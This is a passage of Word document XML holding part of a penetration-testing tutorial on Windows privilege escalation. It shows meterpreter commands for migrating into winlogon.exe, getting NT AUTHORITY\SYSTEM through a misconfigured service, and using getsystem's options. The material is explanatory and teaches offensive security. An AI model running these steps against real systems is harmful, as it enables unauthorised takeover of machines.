    </w:p>
    <w:p w14:paraId="0FAC0D07" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Meterpreter session 1 closed.  Reason: Died</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C8AED" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Back on the windows machine there’s also some output on the command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA8795" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Method execution successful. Out Parameters: instance of \_\_PARAMETERS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ReturnValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 7; };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A601EAA" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>return value of 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that the request timed out. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> bummer we got this far had a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt, which gives us lots of post exploitation goodness, but lost everything. Don’t throw in the towel there is a way around this situation. During those 30 - 40 seconds that we have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command prompt we can migrate to another process. The concept of migrating is exactly what it sounds like, instead of hooking into our ose.exe malicious executable service we can hop to another process that is already running with system privileges. First thing you’ll want to do is list all the processes running on the windows machine to determine the PID of a process that we can migrate to, once again wmic to the rescue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54856129" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>wmic process list brief | find "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED46FA" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Here you’ll want to determine the PID of the winlogon.exe process and the fourth column of this output is the PID of the process. Winlogon.exe is a popular executable to migrate to because it’s always present and runs as the system user. You could easily migrate to another process that runs as system and to determine this you can </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:anchor="Launching_Task_Manager" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>run the task manager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> and look for the user that is associated with the process. If at first you don’t see this make sure to click </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>“show process from all users”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Once you have the PID of the winlogon.exe restart the service by running the wmic service command, ose.exe in this case, then quickly migrate to the winlogon.exe PID within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Below is the command within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to migrate to another process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C89991" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; migrate 460 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">\*\] Migrating to 460... \[\*\] Migration completed successfully. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B84B15" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now we’ve successfully migrated to a stable process as the system user with a restricted user, this was our </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ultimate goal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can determine our current privilege within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332544C3" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server username: NT AUTHORITY\\SYSTEM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBC867" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>At this point you have full control of the operating system and you can leverage all the </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>post exploitation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> goodness that you can get your hands on. I don’t want to go into all the options and features of what to do once you’ve gained system access to a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>windows device</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I’ll leave that to other folks or a different discussion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3EFE9" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>There is one other thing to note about escalating privileges on a windows device. Meterpreter has an option to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">” meaning it tries to get system privileges. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command is only going to work in a handful of scenarios. The two main ways it accomplishes this task is via an unpatched machine or you already have administrative privileges. In the scenario I’ve described we don’t have admin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and our box is fully patched hence the reason I’m describing a technique of looking for services with weak permissions. A service that allows full control by a regular user is a misconfiguration so there is no “patch” for this scenario where we can get system privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A784FA" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s take a closer look at the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, we can do this by simply issuing the command below inside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A541A9" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h Usage: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> \[options\]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4DE3D" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645EAEF0" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Attempt to elevate your privilege to that of local system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A12CB" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435FB4E9" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC2D34" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4F0692" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\-h        Help Banner. -t &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>&gt;  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique to use. (Default to '0'). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>0 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> All techniques available 1 : Service - Named Pipe Impersonation (In Memory/Admin) 2 : Service - Named Pipe Impersonation (Dropper/Admin) 3 : Service - Token Duplication (In Memory/Admin) 4 : Exploit - KiTrap0D (In Memory/User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBF159" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Options 1-3 all require admin privileges, which we don’t have, and option 4 will not work if the system is patched for the kitrap0d exploit. Let’s just verify that the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">” command within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> will not work if we don’t leverage something like a weak service permission. If you still have your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
